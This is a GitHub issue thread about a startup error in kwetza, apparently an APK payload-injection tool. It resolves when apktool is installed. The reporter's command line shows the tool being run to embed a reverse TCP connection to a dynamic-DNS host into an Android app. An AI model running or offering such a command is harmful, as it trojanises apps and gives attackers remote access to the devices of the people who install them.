### ISSUE TITLE
!!!! ERROR IN 'initialize' method

### ISSUE THREAD

**Issue by blackfalg** [sensepost/kwetza#24]
root@kali:~/kwetza# python kwetza.py note.apk tcp semo201564.ddns.net  443 yes
                                           _                  _              ___    ___  
                                          | |                | |            |__ \  / _ \ 
 _ __ ___  _ __ ___  _ __ ___  _ __ ___   | | ____      _____| |_ ______ _     ) || | | |
| '_ ` _ \| '_ ` _ \| '_ ` _ \| '_ ` _ \  | |/ /\ \ /\ / / _ \ __|_  / _` |   / / | | | |
| | | | | | | | | | | | | | | | | | | | | |   <  \ V  V /  __/ |_ / / (_| |  / /_ | |_| |
|_| |_| |_|_| |_| |_|_| |_| |_|_| |_| |_| |_|\_\  \_/\_/ \___|\__/___\__,_| |____(_)___/ 

[*] DECOMPILING TARGET APK
!!!! ERROR IN 'initialize' method
[Errno 2] No such file or directory
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
root@kali:~/kwetza#

**Comment by blackfalg** [comment]
what is error pls

**Comment by n30m1nd** [comment]
what is error pls

**Comment by blackfalg** [comment]
fixed apk tool not installed:)

**Comment by brompwnie** [comment]
Great, glad its working :)

**Comment by lolybob** [comment]
i have the same problem!! but how to install it ???
